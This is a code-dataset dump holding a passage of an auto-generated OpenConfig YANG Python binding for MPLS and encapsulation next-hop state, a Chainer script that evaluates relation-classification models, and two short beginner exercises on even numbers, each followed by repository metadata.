        Setter method for pushed_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/pushed_mpls_label_stack (oc-mplst:mpls-label)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_pushed_mpls_label_stack is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_pushed_mpls_label_stack() directly.
        YANG Description: The MPLS label stack imposed when forwarding packets to the
        next-hop
        - the stack is encoded as a leaf list whereby the order of the
        entries is such that the first entry in the list is the
        label at the bottom of the stack to be pushed.
        To this end, a packet which is to forwarded to a device using
        a service label of 42, and a transport label of 8072 will be
        represented with a label stack list of [42, 8072].
        The MPLS label stack list is ordered by the user, such that no
        system re-ordering of leaves is permitted by the system.
        A swap operation is reflected by entries in the
        popped-mpls-label-stack and pushed-mpls-label-stack nodes.
        """
        # Union-typed values carry a _utype hook; apply it so the validation
        # below sees the underlying native value.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            # Each list member must be either a numeric label in 16..1048575
            # or one of the reserved/special label names.
            t = YANGDynClass(
                v,
                base=TypedListType(
                    allowed_type=[
                        RestrictedClassType(
                            base_type=RestrictedClassType(
                                base_type=long,
                                restriction_dict={"range": ["0..4294967295"]},
                                int_size=32,
                            ),
                            restriction_dict={"range": ["16..1048575"]},
                        ),
                        RestrictedClassType(
                            base_type=six.text_type,
                            restriction_type="dict_key",
                            restriction_arg={
                                "IPV4_EXPLICIT_NULL": {"value": 0},
                                "ROUTER_ALERT": {"value": 1},
                                "IPV6_EXPLICIT_NULL": {"value": 2},
                                "IMPLICIT_NULL": {"value": 3},
                                "ENTROPY_LABEL_INDICATOR": {"value": 7},
                                "NO_LABEL": {},
                            },
                        ),
                    ]
                ),
                is_leaf=False,
                yang_name="pushed-mpls-label-stack",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="oc-mplst:mpls-label",
                is_config=False,
            )
        except (TypeError, ValueError):
            # Surface a structured error naming the expected YANG type.
            raise ValueError(
                {
                    "error-string": """pushed_mpls_label_stack must be of a type compatible with oc-mplst:mpls-label""",
                    "defined-type": "oc-mplst:mpls-label",
                    "generated-type": """YANGDynClass(base=TypedListType(allowed_type=[RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': ['16..1048575']}),RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'IPV4_EXPLICIT_NULL': {'value': 0}, 'ROUTER_ALERT': {'value': 1}, 'IPV6_EXPLICIT_NULL': {'value': 2}, 'IMPLICIT_NULL': {'value': 3}, 'ENTROPY_LABEL_INDICATOR': {'value': 7}, 'NO_LABEL': {}},),]), is_leaf=False, yang_name="pushed-mpls-label-stack", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-mplst:mpls-label', is_config=False)""",
                }
            )
        self.__pushed_mpls_label_stack = t
        # Invoke the change hook when one is registered on this object.
        if hasattr(self, "_set"):
            self._set()
def _unset_pushed_mpls_label_stack(self):
self.__pushed_mpls_label_stack = YANGDynClass(
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="pushed-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
def _get_decapsulate_header(self):
"""
Getter method for decapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/decapsulate_header (oc-aftt:encapsulation-header-type)
YANG Description: When forwarding a packet to the specified next-hop, the local
system performs a decapsulation of the packet - removing the
specified header type. In the case that no next-hop is
specified, the packet header is removed, and a subsequent
forwarding lookup is performed on the packet encapsulated
within the header, matched within the relevant AFT within the
specified network-instance.
"""
return self.__decapsulate_header
    def _set_decapsulate_header(self, v, load=False):
        """
        Setter method for decapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/decapsulate_header (oc-aftt:encapsulation-header-type)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_decapsulate_header is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_decapsulate_header() directly.
        YANG Description: When forwarding a packet to the specified next-hop, the local
        system performs a decapsulation of the packet - removing the
        specified header type. In the case that no next-hop is
        specified, the packet header is removed, and a subsequent
        forwarding lookup is performed on the packet encapsulated
        within the header, matched within the relevant AFT within the
        specified network-instance.
        """
        # Union-typed values carry a _utype hook; apply it so the validation
        # below sees the underlying native value.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            # v must be one of the enumerated encapsulation header types.
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=six.text_type,
                    restriction_type="dict_key",
                    restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
                ),
                is_leaf=True,
                yang_name="decapsulate-header",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="oc-aftt:encapsulation-header-type",
                is_config=False,
            )
        except (TypeError, ValueError):
            # Surface a structured error naming the expected YANG type.
            raise ValueError(
                {
                    "error-string": """decapsulate_header must be of a type compatible with oc-aftt:encapsulation-header-type""",
                    "defined-type": "oc-aftt:encapsulation-header-type",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'GRE': {}, 'IPV4': {}, 'IPV6': {}, 'MPLS': {}},), is_leaf=True, yang_name="decapsulate-header", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-aftt:encapsulation-header-type', is_config=False)""",
                }
            )
        self.__decapsulate_header = t
        # Invoke the change hook when one is registered on this object.
        if hasattr(self, "_set"):
            self._set()
def _unset_decapsulate_header(self):
self.__decapsulate_header = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="decapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
def _get_encapsulate_header(self):
"""
Getter method for encapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/encapsulate_header (oc-aftt:encapsulation-header-type)
YANG Description: When forwarding a packet to the specified next-hop the local
system performs an encapsulation of the packet - adding the
specified header type.
"""
return self.__encapsulate_header
    def _set_encapsulate_header(self, v, load=False):
        """
        Setter method for encapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/encapsulate_header (oc-aftt:encapsulation-header-type)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_encapsulate_header is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_encapsulate_header() directly.
        YANG Description: When forwarding a packet to the specified next-hop the local
        system performs an encapsulation of the packet - adding the
        specified header type.
        """
        # Union-typed values carry a _utype hook; apply it so the validation
        # below sees the underlying native value.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            # v must be one of the enumerated encapsulation header types.
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=six.text_type,
                    restriction_type="dict_key",
                    restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
                ),
                is_leaf=True,
                yang_name="encapsulate-header",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="oc-aftt:encapsulation-header-type",
                is_config=False,
            )
        except (TypeError, ValueError):
            # Surface a structured error naming the expected YANG type.
            raise ValueError(
                {
                    "error-string": """encapsulate_header must be of a type compatible with oc-aftt:encapsulation-header-type""",
                    "defined-type": "oc-aftt:encapsulation-header-type",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'GRE': {}, 'IPV4': {}, 'IPV6': {}, 'MPLS': {}},), is_leaf=True, yang_name="encapsulate-header", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-aftt:encapsulation-header-type', is_config=False)""",
                }
            )
        self.__encapsulate_header = t
        # Invoke the change hook when one is registered on this object.
        if hasattr(self, "_set"):
            self._set()
def _unset_encapsulate_header(self):
self.__encapsulate_header = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="encapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
def _get_origin_protocol(self):
"""
Getter method for origin_protocol, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/origin_protocol (identityref)
YANG Description: The protocol from which the AFT entry was learned.
"""
return self.__origin_protocol
    def _set_origin_protocol(self, v, load=False):
        """
        Setter method for origin_protocol, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/origin_protocol (identityref)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_origin_protocol is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_origin_protocol() directly.
        YANG Description: The protocol from which the AFT entry was learned.
        """
        # Union-typed values carry a _utype hook; apply it so the validation
        # below sees the underlying native value.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            # v must be one of the openconfig-policy-types install-protocol
            # identities; each identity is accepted bare or with the
            # "oc-pol-types:" / "oc-pt:" module prefixes.
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=six.text_type,
                    restriction_type="dict_key",
                    restriction_arg={
                        "BGP": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:BGP": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:BGP": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "ISIS": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:ISIS": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:ISIS": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "OSPF": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:OSPF": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:OSPF": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "OSPF3": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:OSPF3": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:OSPF3": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "STATIC": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:STATIC": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:STATIC": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "DIRECTLY_CONNECTED": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:DIRECTLY_CONNECTED": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:DIRECTLY_CONNECTED": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "LOCAL_AGGREGATE": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:LOCAL_AGGREGATE": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:LOCAL_AGGREGATE": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                    },
                ),
                is_leaf=True,
                yang_name="origin-protocol",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="identityref",
                is_config=False,
            )
        except (TypeError, ValueError):
            # Surface a structured error naming the expected YANG type.
            raise ValueError(
                {
                    "error-string": """origin_protocol must be of a type compatible with identityref""",
                    "defined-type": "openconfig-network-instance:identityref",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'BGP': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:BGP': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:BGP': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'ISIS': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:ISIS': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:ISIS': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'OSPF': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:OSPF': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:OSPF': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'OSPF3': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:OSPF3': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:OSPF3': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'STATIC': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:STATIC': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:STATIC': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'DIRECTLY_CONNECTED': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:DIRECTLY_CONNECTED': {'@module': 'openconfig-policy-types', 
'@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:DIRECTLY_CONNECTED': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'LOCAL_AGGREGATE': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:LOCAL_AGGREGATE': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:LOCAL_AGGREGATE': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}},), is_leaf=True, yang_name="origin-protocol", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=False)""",
                }
            )
        self.__origin_protocol = t
        # Invoke the change hook when one is registered on this object.
        if hasattr(self, "_set"):
            self._set()
def _unset_origin_protocol(self):
self.__origin_protocol = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
},
),
is_leaf=True,
yang_name="origin-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
index = __builtin__.property(_get_index)
weight = __builtin__.property(_get_weight)
ip_address = __builtin__.property(_get_ip_address)
mac_address = __builtin__.property(_get_mac_address)
popped_mpls_label_stack = __builtin__.property(_get_popped_mpls_label_stack)
pushed_mpls_label_stack = __builtin__.property(_get_pushed_mpls_label_stack)
decapsulate_header = __builtin__.property(_get_decapsulate_header)
encapsulate_header = __builtin__.property(_get_encapsulate_header)
origin_protocol = __builtin__.property(_get_origin_protocol)
_pyangbind_elements = OrderedDict(
[
("index", index),
("weight", weight),
("ip_address", ip_address),
("mac_address", mac_address),
("popped_mpls_label_stack", popped_mpls_label_stack),
("pushed_mpls_label_stack", pushed_mpls_label_stack),
("decapsulate_header", decapsulate_header),
("encapsulate_header", encapsulate_header),
("origin_protocol", origin_protocol),
]
)
| [
"dbarrosop@dravetech.com"
] | dbarrosop@dravetech.com |
61560f710bb716afd489fc8a677ebbca9b049ae7 | 4be4862a6dea072af24be85b0bf632e08481e559 | /codes/eval_relation_model6.py | 592c04263134cf6477bb1a3532ee8dd667e1e244 | [] | no_license | manish-mishr/SceneGraphGeneration | 2834541ca0f3781fcc88ef2ca8067974bba90723 | dd15bbd88646f6194c1f3e16d2f1435473286cfd | refs/heads/master | 2021-01-19T08:17:56.026501 | 2016-05-04T09:03:16 | 2016-05-04T09:03:16 | 82,080,463 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,424 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
os.environ["CHAINER_TYPE_CHECK"] = "0" #to disable type check.
import chainer
#Check che below is False if you disabled type check
#print(chainer.functions.Linear(1,1).type_check_enable)
import os
import chainer.functions as F
from chainer import cuda
from chainer import Function, FunctionSet, Variable, optimizers, serializers
import argparse
import numpy as np
import cPickle as cpickle
import pickle
import random
import unicodecsv as csv
from tqdm import tqdm
import cv2
#Settings can be changed by command line arguments
gpu_id=0# GPU ID. if you want to use cpu, -1
model_dir='../experiment6/'
savedir=model_dir
#Override Settings by argument
parser = argparse.ArgumentParser(description=u"caption generation")
parser.add_argument("-g", "--gpu",default=gpu_id, type=int, help=u"GPU ID.CPU is -1")
parser.add_argument("-m", "--modeldir",default=model_dir, type=str, help=u"The directory that have models")
args = parser.parse_args()
gpu_id=args.gpu
model_dir= args.modeldir
#Gpu Setting
if gpu_id >= 0:
xp = cuda.cupy
cuda.get_device(gpu_id).use()
else:
xp=np
#Prepare Data
print("loading preprocessed data")
with open('../work/relationship_val_features.cpickle', 'r') as f:
image_id2image_feature=cpickle.load(f)
with open('../work/relationship_val_triple_features.cpickle', 'r') as f:
triple_id2subject_feature, triple_id2object_feature,triple_id2relation_id=cpickle.load(f)
with open('../work/relationship_test_features.cpickle', 'r') as f:
image_id2image_feature_test=cpickle.load(f)
with open('../work/relationship_test_triple_features.cpickle', 'r') as f:
triple_id2subject_feature_test, triple_id2object_feature_test,triple_id2relation_id_test=cpickle.load(f)
with open('../work/rel_triple_id2image_id.pkl', 'r') as f:
rel_triple_id2image_id=pickle.load(f)
with open('../work/index2relation.pkl', 'r') as f:
index2relation=pickle.load(f)
relation2index = dict((v, k) for k, v in index2relation.iteritems())
#Model Preparation
print "preparing model"
image_feature_dim=1024#image feature dimention per image
n_units = 128 # number of units per layer
vocab_size=len(relation2index)
model = chainer.FunctionSet()
model.img_feature2vec=F.Linear(3*image_feature_dim, n_units)#parameter W,b
model.h1=F.Linear(n_units, n_units)#hidden unit,#parameter W,b
model.h2=F.Linear(n_units, n_units)#hidden unit,#parameter W,b
model.out=F.Linear(n_units, vocab_size)#parameter W,b
#Parameter Initialization
for param in model.params():
data = param.data
data[:] = np.random.uniform(-0.1, 0.1, data.shape)
#To GPU
if gpu_id >= 0:
model.to_gpu()
#Define Newtowork (Forward)
def forward(x_data, y_data,train=True):
x = Variable(x_data,volatile=not train)
t = Variable(y_data,volatile=not train)
feature_input = F.relu(model.img_feature2vec(x))
l1 = F.dropout(F.relu(model.h1(feature_input)), train=True)
l2 = F.dropout(F.relu(model.h2(l1)), train=True)
y = model.out(l2)
loss=F.softmax_cross_entropy(y, t)
accuracy=F.accuracy(y, t)
return loss,accuracy
optimizer = optimizers.Adam()
optimizer.setup(model)
#Validiation Setting
batchsize=1024
num_train_data=len(triple_id2subject_feature)
all_triple_ids=triple_id2subject_feature.keys()
#Begin Validiating
loss_list=[]
accuracy_list=[]
for i in xrange(200):
model_place=model_dir+'/relation_model%d.chainer'%i
print model_place
if os.path.exists(model_place):
serializers.load_hdf5(model_place, model)#load modeldir
else:
continue
sum_loss = 0
sum_accuracy=0
for i in tqdm(xrange(0, num_train_data, batchsize)):
x_batch_list=[]
y_batch_list=[]
for j in xrange(batchsize):
#get ids and features
if i+j < num_train_data:
triple_id=all_triple_ids[i+j]
else:
break
subject_feature=triple_id2subject_feature[triple_id]
object_feature=triple_id2object_feature[triple_id]
image_id=rel_triple_id2image_id[triple_id]
image_feature=image_id2image_feature[image_id]
#make concatnated vector
vec=np.zeros([3*image_feature_dim],dtype=np.float32)
vec[0:image_feature_dim]=image_feature
vec[image_feature_dim:2*image_feature_dim]=subject_feature
vec[2*image_feature_dim:3*image_feature_dim]=object_feature
rel_id=triple_id2relation_id[triple_id]
x_batch_list.append(vec)
y_batch_list.append(rel_id)
x_batch=np.array(x_batch_list,dtype=np.float32)
y_batch=np.array(y_batch_list,dtype=np.int32)
if gpu_id >= 0:
x_batch = cuda.to_gpu(x_batch)
y_batch = cuda.to_gpu(y_batch)
loss, accuracy = forward(x_batch, y_batch, train=False)
sum_loss += loss.data * batchsize
sum_accuracy += accuracy.data * batchsize
mean_loss = sum_loss / num_train_data
mean_accuracy = sum_accuracy / num_train_data
print mean_loss,mean_accuracy
accuracy_list.append(mean_accuracy)
loss_list.append(mean_loss)
with open(savedir+"val_mean_loss.txt", "a") as f:
f.write(str(mean_loss)+'\n')
with open(savedir+"val_mean_accuracy.txt", "a") as f:
f.write(str(mean_accuracy)+'\n')
#Test evaluation
triple_id2subject_feature, triple_id2object_feature,triple_id2relation_id=triple_id2subject_feature_test, triple_id2object_feature_test,triple_id2relation_id_test
image_id2image_feature=image_id2image_feature_test
batchsize=1024
num_train_data=len(triple_id2subject_feature)
all_triple_ids=triple_id2subject_feature.keys()
argmax=np.argmax(accuracy_list)
model_place=model_dir+'/relation_model%d.chainer'%argmax
print model_place
serializers.load_hdf5(model_place, model)#load modeldir
sum_loss = 0
sum_accuracy=0
for i in tqdm(xrange(0, num_train_data, batchsize)):
x_batch_list=[]
y_batch_list=[]
for j in xrange(batchsize):
#get ids and features
if i+j < num_train_data:
triple_id=all_triple_ids[i+j]
else:
break
subject_feature=triple_id2subject_feature[triple_id]
object_feature=triple_id2object_feature[triple_id]
image_id=rel_triple_id2image_id[triple_id]
image_feature=image_id2image_feature[image_id]
#make concatnated vector
vec=np.zeros([3*image_feature_dim],dtype=np.float32)
vec[0:image_feature_dim]=image_feature
vec[image_feature_dim:2*image_feature_dim]=subject_feature
vec[2*image_feature_dim:3*image_feature_dim]=object_feature
rel_id=triple_id2relation_id[triple_id]
x_batch_list.append(vec)
y_batch_list.append(rel_id)
x_batch=np.array(x_batch_list,dtype=np.float32)
y_batch=np.array(y_batch_list,dtype=np.int32)
if gpu_id >= 0:
x_batch = cuda.to_gpu(x_batch)
y_batch = cuda.to_gpu(y_batch)
loss, accuracy = forward(x_batch, y_batch, train=False)
sum_loss += loss.data * batchsize
sum_accuracy += accuracy.data * batchsize
mean_loss = sum_loss / num_train_data
mean_accuracy = sum_accuracy / num_train_data
print "test loss and test accuracy"
print mean_loss,mean_accuracy
with open(savedir+"tes_mean_loss_accuracy.txt", "w") as f:
f.write(str(mean_loss)+","+str(mean_accuracy)+'\n')
| [
"stsutsui@saturn.ils.indiana.edu"
] | stsutsui@saturn.ils.indiana.edu |
f33359a0ad4254a2ca5e75a31162ed6cee672a40 | d57d97ca4cc3c9a643c23f34caeb97df6619602d | /give_n_num_nd_print_nearest_even_value.py | b8ca28667b4f3fccb9b6f8726df6709fd6cd4874 | [] | no_license | kk31398/guvi-project | 6ce88468aad3a8766f21cda4cc45904a278018d0 | adbd81967510f87181fe1d6d0bb1224cc61b1522 | refs/heads/master | 2021-07-19T00:07:14.979096 | 2018-10-08T18:30:23 | 2018-10-08T18:30:23 | 128,938,296 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | n=int(input())
a=[]
for i in range(1,n+1):
if(i%2==0):
a.append(i)
print (''.join(map(str, a[-1:])))
| [
"noreply@github.com"
] | kk31398.noreply@github.com |
dabfa0df4dcba392620e99b0a0c648b3f7b4d64f | 0c94137fdc8c742d932d63eff70b6873b60dda2a | /Lesson_3/Check/Lesson3/zadanie2.py | 3d37e9431bcfbb00aece9f8b85759baa4c11caba | [] | no_license | MakarVS/GeekBrains_Algorithms_Python | f1c9236326eec4d9ba12692527384db75928c789 | 30b006b13faedc8fd3f9d291dbdf55107f476edf | refs/heads/master | 2022-04-26T12:04:48.268870 | 2020-04-26T19:19:32 | 2020-04-26T19:19:32 | 255,070,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | #Во втором массиве сохранить индексы четных элементов первого массива. Например, если дан массив со значениями 8, 3, 15, 6, 4, 2, второй массив надо заполнить значениями 0, 3, 4, 5 (помните, что индексация начинается с нуля), т. к. именно в этих позициях первого массива стоят четные числа.
massiv1=[2,6,4,61,13,76,22,15]
massiv2=[]
for i in massiv1:
if i%2==0:
x=massiv1.index(i)
massiv2.append(x)
print(massiv2) | [
"makarvs71@yandex.ru"
] | makarvs71@yandex.ru |
